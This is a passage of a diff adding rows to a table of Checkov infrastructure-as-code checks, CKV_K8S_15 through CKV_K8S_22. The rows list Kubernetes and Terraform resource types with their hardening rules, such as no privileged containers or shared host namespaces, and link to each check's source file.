[ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2786 | CKV_K8S_15 | resource | PodTemplate | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2787 | CKV_K8S_15 | resource | ReplicaSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2788 | CKV_K8S_15 | resource | ReplicationController | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2789 | CKV_K8S_15 | resource | StatefulSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2790 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2791 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2792 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2793 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | 
[ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2794 | CKV_K8S_16 | resource | CronJob | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2795 | CKV_K8S_16 | resource | DaemonSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2796 | CKV_K8S_16 | resource | Deployment | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2797 | CKV_K8S_16 | resource | DeploymentConfig | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2798 | CKV_K8S_16 | resource | Job | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2799 | CKV_K8S_16 | resource | Pod | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2800 | CKV_K8S_16 | resource | PodTemplate | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2801 | CKV_K8S_16 | resource | ReplicaSet | Container should not be privileged | Kubernetes | 
[PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2802 | CKV_K8S_16 | resource | ReplicationController | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2803 | CKV_K8S_16 | resource | StatefulSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2804 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2805 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2806 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2807 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2808 | CKV_K8S_17 | resource | CronJob | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2809 | CKV_K8S_17 | resource | DaemonSet | Containers should not share the host process ID namespace | Kubernetes | 
[ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2810 | CKV_K8S_17 | resource | Deployment | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2811 | CKV_K8S_17 | resource | Job | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2812 | CKV_K8S_17 | resource | Pod | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2813 | CKV_K8S_17 | resource | ReplicaSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2814 | CKV_K8S_17 | resource | ReplicationController | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2815 | CKV_K8S_17 | resource | StatefulSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2816 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2817 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID 
namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2818 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2819 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2820 | CKV_K8S_18 | resource | CronJob | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2821 | CKV_K8S_18 | resource | DaemonSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2822 | CKV_K8S_18 | resource | Deployment | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2823 | CKV_K8S_18 | resource | Job | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2824 | CKV_K8S_18 | resource | Pod | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2825 | CKV_K8S_18 | resource | ReplicaSet | Containers should not share the host IPC namespace | Kubernetes | 
[ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2826 | CKV_K8S_18 | resource | ReplicationController | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2827 | CKV_K8S_18 | resource | StatefulSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2828 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2829 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2830 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2831 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2832 | CKV_K8S_19 | resource | CronJob | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2833 | CKV_K8S_19 | resource | DaemonSet | 
Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2834 | CKV_K8S_19 | resource | Deployment | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2835 | CKV_K8S_19 | resource | Job | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2836 | CKV_K8S_19 | resource | Pod | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2837 | CKV_K8S_19 | resource | ReplicaSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2838 | CKV_K8S_19 | resource | ReplicationController | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2839 | CKV_K8S_19 | resource | StatefulSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2840 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | 
[SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2841 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2842 | CKV_K8S_19 | resource | kubernetes_pod | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2843 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2844 | CKV_K8S_20 | resource | CronJob | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2845 | CKV_K8S_20 | resource | DaemonSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2846 | CKV_K8S_20 | resource | Deployment | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2847 | CKV_K8S_20 | resource | DeploymentConfig | Containers should not run with allowPrivilegeEscalation | Kubernetes | 
[AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2848 | CKV_K8S_20 | resource | Job | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2849 | CKV_K8S_20 | resource | Pod | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2850 | CKV_K8S_20 | resource | PodTemplate | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2851 | CKV_K8S_20 | resource | ReplicaSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2852 | CKV_K8S_20 | resource | ReplicationController | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2853 | CKV_K8S_20 | resource | StatefulSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2854 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | 
[AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2855 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2856 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2857 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2858 | CKV_K8S_21 | resource | ConfigMap | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2859 | CKV_K8S_21 | resource | CronJob | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2860 | CKV_K8S_21 | resource | DaemonSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2861 | CKV_K8S_21 | resource | Deployment | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2862 | CKV_K8S_21 | resource | Ingress | The default 
namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2863 | CKV_K8S_21 | resource | Job | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2864 | CKV_K8S_21 | resource | Pod | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2865 | CKV_K8S_21 | resource | ReplicaSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2866 | CKV_K8S_21 | resource | ReplicationController | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2867 | CKV_K8S_21 | resource | Role | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2868 | CKV_K8S_21 | resource | RoleBinding | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2869 | CKV_K8S_21 | resource | Secret | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2870 | CKV_K8S_21 | resource | Service | The default namespace should not be used | Kubernetes | 
[DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2871 | CKV_K8S_21 | resource | ServiceAccount | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2872 | CKV_K8S_21 | resource | StatefulSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2873 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2874 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2875 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2876 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2877 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2878 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | 
[DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2879 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2880 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2881 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2882 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2883 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2884 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2885 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2886 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform 
| [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2887 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2888 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2889 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2890 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2891 | CKV_K8S_21 | resource | kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2892 | CKV_K8S_21 | resource | kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2893 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2894 | CKV_K8S_21 | resource | kubernetes_service_account 
| The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2895 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2896 | CKV_K8S_21 | resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2897 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2898 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2899 | CKV_K8S_22 | resource | CronJob | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2900 | CKV_K8S_22 | resource | DaemonSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2901 | CKV_K8S_22 | resource | Deployment | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2902 | 
CKV_K8S_22 | resource | DeploymentConfig | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2903 | CKV_K8S_22 | resource | Job | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2904 | CKV_K8S_22 | resource | Pod | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2905 | CKV_K8S_22 | resource | PodTemplate | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2906 | CKV_K8S_22 | resource | ReplicaSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2907 | CKV_K8S_22 | resource | ReplicationController | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2908 | CKV_K8S_22 | resource | StatefulSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2909 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | 
